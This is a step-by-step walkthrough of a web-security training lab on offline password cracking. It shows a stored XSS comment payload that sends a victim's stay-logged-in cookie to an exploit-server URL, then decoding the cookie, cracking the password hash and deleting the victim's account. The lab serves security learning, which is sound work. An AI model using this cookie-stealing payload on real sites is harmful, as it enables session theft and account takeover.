This lab is in the same series than the previous article. The goal here to steal Carlos’s “stay-logged-in” cookie to steal and delete his account.
Lab: Offline password cracking
Click “My account button”
Enter Wiener’s credentials, click “stay-logged-in” option and click “Log in”
In Proxy > HTTP History, click the the GET reset “/my-account” and click on the arrow on the “stay-logged-in” cookie
The base64 string is decoded:
username:password
OClick “Home”
Click a “View post” button
In another tab, open the Exploit Server
Copy its URL
On the post opened at step 6, bottom page, add the following payload (change the URL for your exploit server), as well as random name, email address and website URL. Then click “Post comment”:
<script>document.location='https://exploit-server-url.com'+document.cookie</script>
Click “Back to blog”
The blog post will be redirected to a similar page (here on Firefox)
Go back the the exploit server and click “Access log”
A GET reset “/exploitserver” appears in the list, containing a “stay-logged-in” cookie, copy its string
Go to base64decode.org, paste the string previously copied to decode it and copy the hashed password, after “
carlos:
”Go to crackstation.net and paste the hash to get Carlos’s password
Go back to the lab’s tab and click multiple times on the “Go back” button until you can see the website without being redirected
If needed, click “My account”, according to the point you have reached using the “Go back” button, and click “Log out”
Click “My account” again
Enter “carlos” as a username and the password previously found at step 16 on Crackstation, “onceuponatime”, and click “Log in”
When you are on Carlos’s “My account” page, click “Delete account”
Paste one more time his password as a confirmation and click “Delete account!”
The lab is solved